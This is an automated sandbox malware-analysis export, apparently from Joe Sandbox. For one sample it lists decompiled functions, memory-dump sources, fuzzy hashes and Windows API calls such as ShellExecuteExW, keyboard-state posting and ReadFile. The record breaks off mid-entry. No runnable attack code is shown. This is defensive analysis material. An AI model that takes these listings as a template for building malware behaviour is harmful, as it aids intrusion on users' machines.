                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: IconLoad
                    • String ID: blank$info$question$stop$warning
                    • API String ID: 2457776203-404129466
                    • Opcode ID: d9aab84d83676eba7552c040e2b3b4f271fc461ef67dbc394dae5c05c1bad109
                    • Instruction ID: f2a7a512a361290fe1000465c98cf7ed735ca5a8be7ea981776ee82d080c3afb
                    • Opcode Fuzzy Hash: d9aab84d83676eba7552c040e2b3b4f271fc461ef67dbc394dae5c05c1bad109
                    • Instruction Fuzzy Hash: 4311277120874AFBA7055F54DC43E6AB79CFF5B370F20012AF905A62C1E66D6B4045A5
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 007A454E
                    • LoadStringW.USER32(00000000), ref: 007A4555
                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007A456B
                    • LoadStringW.USER32(00000000), ref: 007A4572
                    • _wprintf.LIBCMT ref: 007A4598
                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007A45B6
                    Strings
                    • %s (%d) : ==> %s: %s %s, xrefs: 007A4593
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: HandleLoadModuleString$Message_wprintf
                    • String ID: %s (%d) : ==> %s: %s %s
                    • API String ID: 3648134473-3128320259
                    • Opcode ID: c93fb3f7a32decd6834fe203b20443b92fea94a3e32a700a36f615e088e581b5
                    • Instruction ID: 879c4cc96d094385de12386eeb8b01cf3c53890151dfbf553744359d658030ae
                    • Opcode Fuzzy Hash: c93fb3f7a32decd6834fe203b20443b92fea94a3e32a700a36f615e088e581b5
                    • Instruction Fuzzy Hash: 31014FF2900208BFE710A7A09D89EE6776DD708301F0045A9FB49E2151EA799E858B79
                    APIs
                      • Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623
                    • GetSystemMetrics.USER32(0000000F), ref: 007CD78A
                    • GetSystemMetrics.USER32(0000000F), ref: 007CD7AA
                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 007CD9E5
                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007CDA03
                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007CDA24
                    • ShowWindow.USER32(00000003,00000000), ref: 007CDA43
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 007CDA68
                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 007CDA8B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                    • String ID:
                    • API String ID: 1211466189-0
                    • Opcode ID: aecdd5736bd455be79ade44e5eac42e487e14e32d52e005bd789a0e3b7cded41
                    • Instruction ID: e5279f44af32e31d29a74c47782785dce06884480f213f7ac37949663715a84b
                    • Opcode Fuzzy Hash: aecdd5736bd455be79ade44e5eac42e487e14e32d52e005bd789a0e3b7cded41
                    • Instruction Fuzzy Hash: EDB16675600225ABDF24CF68C989BAD7BB2FF48701F09C17DED48AA295D738AD50CB50
                    APIs
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0077C417,00000004,00000000,00000000,00000000), ref: 00742ACF
                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0077C417,00000004,00000000,00000000,00000000,000000FF), ref: 00742B17
                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0077C417,00000004,00000000,00000000,00000000), ref: 0077C46A
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0077C417,00000004,00000000,00000000,00000000), ref: 0077C4D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ShowWindow
                    • String ID:
                    • API String ID: 1268545403-0
                    • Opcode ID: e56b09644d14eb17d772f763626af8bfd7462cf44a6e9073ac25e864579c64e0
                    • Instruction ID: fe0f39db565c08c7c2ded63c5c65075e36318be8394fa8c2e30e001288d03f67
                    • Opcode Fuzzy Hash: e56b09644d14eb17d772f763626af8bfd7462cf44a6e9073ac25e864579c64e0
                    • Instruction Fuzzy Hash: AA4109313047C0AACB368B289C9CB7A7B92EB46300F98C81DFC4B96562D77D9867D711
                    APIs
                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 007A737F
                      • Part of subcall function 00760FF6: std::exception::exception.LIBCMT ref: 0076102C
                      • Part of subcall function 00760FF6: __CxxThrowException@8.LIBCMT ref: 00761041
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007A73B6
                    • EnterCriticalSection.KERNEL32(?), ref: 007A73D2
                    • _memmove.LIBCMT ref: 007A7420
                    • _memmove.LIBCMT ref: 007A743D
                    • LeaveCriticalSection.KERNEL32(?), ref: 007A744C
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007A7461
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 007A7480
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                    • String ID:
                    • API String ID: 256516436-0
                    • Opcode ID: 52706fd41c48cfc528786730cd5e4fb0d715d2622757ea88f4f791fc6f4711cb
                    • Instruction ID: 2dd99ce8f3e731823fb13e2b5c9f4ce325c2ff8782aa1cdb07f24249cf01bdc0
                    • Opcode Fuzzy Hash: 52706fd41c48cfc528786730cd5e4fb0d715d2622757ea88f4f791fc6f4711cb
                    • Instruction Fuzzy Hash: CF315E71904205EBCF10DF54DC89EAF7B78FF45710B1481A9FD05AB246DB389A14DBA4
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 007C645A
                    • GetDC.USER32(00000000), ref: 007C6462
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007C646D
                    • ReleaseDC.USER32(00000000,00000000), ref: 007C6479
                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007C64B5
                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007C64C6
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007C9299,?,?,000000FF,00000000,?,000000FF,?), ref: 007C6500
                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007C6520
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                    • String ID:
                    • API String ID: 3864802216-0
                    • Opcode ID: 0f7b148435aa437e337aab6df0ebc80c63f3adddc382c860035075f3a692ecc2
                    • Instruction ID: e20adb1e902ad624a568a56617864ef936e5923b15c06f6289b10144af4e798a
                    • Opcode Fuzzy Hash: 0f7b148435aa437e337aab6df0ebc80c63f3adddc382c860035075f3a692ecc2
                    • Instruction Fuzzy Hash: 49317172101214BFEB118F50DC8AFEA3FAAEF09761F044069FE08EA291D6799C51CB64
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    • Opcode ID: 77806152166b8e4de3732fbf2727b582039b5fccc4ecf06f9b957c8082da8783
                    • Instruction ID: d3ced51db49e95f389d9ff3b3ea37667f3da85f7285b8a409d8aca1ac98c503c
                    • Opcode Fuzzy Hash: 77806152166b8e4de3732fbf2727b582039b5fccc4ecf06f9b957c8082da8783
                    • Instruction Fuzzy Hash: 4221C5A5740209F7DE16A524AD4AFBB336CAF20394F480021FD0A96383EB9DDE12C5B5
                    APIs
                      • Part of subcall function 00749997: __itow.LIBCMT ref: 007499C2
                      • Part of subcall function 00749997: __swprintf.LIBCMT ref: 00749A0C
                      • Part of subcall function 0075FEC6: _wcscpy.LIBCMT ref: 0075FEE9
                    • _wcstok.LIBCMT ref: 007AEEFF
                    • _wcscpy.LIBCMT ref: 007AEF8E
                    • _memset.LIBCMT ref: 007AEFC1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                    • String ID: X
                    • API String ID: 774024439-3081909835
                    • Opcode ID: 3e0a2e67ff937c9f73b83a6a07c96bcd1a729d14a33631701d8b217b1ad7b11c
                    • Instruction ID: 8a4bb28cfc8f137a90101e6f102bdc5b2073b6d9cf3d7ae3c3a945b1e218202f
                    • Opcode Fuzzy Hash: 3e0a2e67ff937c9f73b83a6a07c96bcd1a729d14a33631701d8b217b1ad7b11c
                    • Instruction Fuzzy Hash: 83C15E71608340DFC714EF64C889A5BB7E4EF85310F044A2DF999972A2DB38ED45CB92
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ea0df0869582e175b50b10455c4faf6d7be59d0383ee8612273fe21e18704b43
                    • Instruction ID: 7cea7008b06800937215fd80c0f608d5b79ba23e21d66c47aa918031c130bb4c
                    • Opcode Fuzzy Hash: ea0df0869582e175b50b10455c4faf6d7be59d0383ee8612273fe21e18704b43
                    • Instruction Fuzzy Hash: 53714930900109EFCB04EF98CC89ABEBB79FF85354F548159F915AA251C738AA91CFA4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d88fbe202fe905c3a283b5aa9abc0c3d64a4034f9a554c46eaf8163d105e6404
                    • Instruction ID: 5ab8c90be5a941e3e2a6b4d49e80d485e20a60253ed15fcea3c85e7182cfb568
                    • Opcode Fuzzy Hash: d88fbe202fe905c3a283b5aa9abc0c3d64a4034f9a554c46eaf8163d105e6404
                    • Instruction Fuzzy Hash: 98619D71508300EBC714EB24CC8AFAFB7E9AF84714F548A1DF6559B292DB789D04C792
                    APIs
                    • IsWindow.USER32(01685788), ref: 007CB6A5
                    • IsWindowEnabled.USER32(01685788), ref: 007CB6B1
                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 007CB795
                    • SendMessageW.USER32(01685788,000000B0,?,?), ref: 007CB7CC
                    • IsDlgButtonChecked.USER32(?,?), ref: 007CB809
                    • GetWindowLongW.USER32(01685788,000000EC), ref: 007CB82B
                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007CB843
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                    • String ID:
                    • API String ID: 4072528602-0
                    • Opcode ID: 4b9931c1d305c0e134107d0a4671b027242f8bdb47e2054c90c9e6f422b6dac7
                    • Instruction ID: a9a711a9eb0d7abe3720eb0868ed829f0d2376fc5a429ec298adfe5898edf307
                    • Opcode Fuzzy Hash: 4b9931c1d305c0e134107d0a4671b027242f8bdb47e2054c90c9e6f422b6dac7
                    • Instruction Fuzzy Hash: ED717B34600204EFDB259FA4C896FBA7BB9FF49300F14406EF946A72A1C739A961DB54
                    APIs
                    • _memset.LIBCMT ref: 007BF75C
                    • _memset.LIBCMT ref: 007BF825
                    • ShellExecuteExW.SHELL32(?), ref: 007BF86A
                      • Part of subcall function 00749997: __itow.LIBCMT ref: 007499C2
                      • Part of subcall function 00749997: __swprintf.LIBCMT ref: 00749A0C
                      • Part of subcall function 0075FEC6: _wcscpy.LIBCMT ref: 0075FEE9
                    • GetProcessId.KERNEL32(00000000), ref: 007BF8E1
                    • CloseHandle.KERNEL32(00000000), ref: 007BF910
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                    • String ID: @
                    • API String ID: 3522835683-2766056989
                    • Opcode ID: 53a0f070590770d5537c68ab7bd5c1d54bfd2fc6b36593443717545dc4a2042f
                    • Instruction ID: 72473310afa3ef2986645c98dc849b8f272220c5d4b05c87bfc902c059eb9c75
                    • Opcode Fuzzy Hash: 53a0f070590770d5537c68ab7bd5c1d54bfd2fc6b36593443717545dc4a2042f
                    • Instruction Fuzzy Hash: 21619175A00619DFCF14DF64C889AAEBBF5FF49710F148469E846AB351DB38AE40CB90
                    APIs
                    • GetParent.USER32(?), ref: 007A149C
                    • GetKeyboardState.USER32(?), ref: 007A14B1
                    • SetKeyboardState.USER32(?), ref: 007A1512
                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 007A1540
                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 007A155F
                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 007A15A5
                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 007A15C8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: f11b0a7cef37031e536c5e79d097f2975e8d5c33f7708e2a47df86fc0875ee11
                    • Instruction ID: dea99fbb1171aa78a51f49bb6313ab7c9ec9c623ca9092660c57724debe0ed6e
                    • Opcode Fuzzy Hash: f11b0a7cef37031e536c5e79d097f2975e8d5c33f7708e2a47df86fc0875ee11
                    • Instruction Fuzzy Hash: 6B51E3A0A047D53EFB3646388C49BBABFA95B87304F4C8689E1D5968C2C7DCEC94D750
                    APIs
                    • GetParent.USER32(00000000), ref: 007A12B5
                    • GetKeyboardState.USER32(?), ref: 007A12CA
                    • SetKeyboardState.USER32(?), ref: 007A132B
                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007A1357
                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007A1374
                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007A13B8
                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007A13D9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: 8de0cf3cdd514234a57482334db403233e4aac302a05b3a31d20b58a7659f2e0
                    • Instruction ID: 13a84f0a77030e3236216f1570880e5b60e27362b9f5c1ff58f86e878011df2e
                    • Opcode Fuzzy Hash: 8de0cf3cdd514234a57482334db403233e4aac302a05b3a31d20b58a7659f2e0
                    • Instruction Fuzzy Hash: CB51F5A0A047D57DFF3287248C55BBABFA96F87300F488689E1D45A8C2D39DEC94D760
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _wcsncpy$LocalTime
                    • String ID:
                    • API String ID: 2945705084-0
                    • Opcode ID: effef77e7da6996b99151d3bcf21fb0d6ac692929d7132f3711c370b3ce96cf8
                    • Instruction ID: 69f0f1ecff2175bc05423447bb0cbfb1046a36513bc623b68f473bcf5b0e4938
                    • Opcode Fuzzy Hash: effef77e7da6996b99151d3bcf21fb0d6ac692929d7132f3711c370b3ce96cf8
                    • Instruction Fuzzy Hash: 8A41B465D20528BACB10EBB4C88E9CF77A8AF05710F508562F919E3122F738E715C7A9
                    APIs
                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0079DAC5
                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0079DAFB
                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0079DB0C
                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0079DB8E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
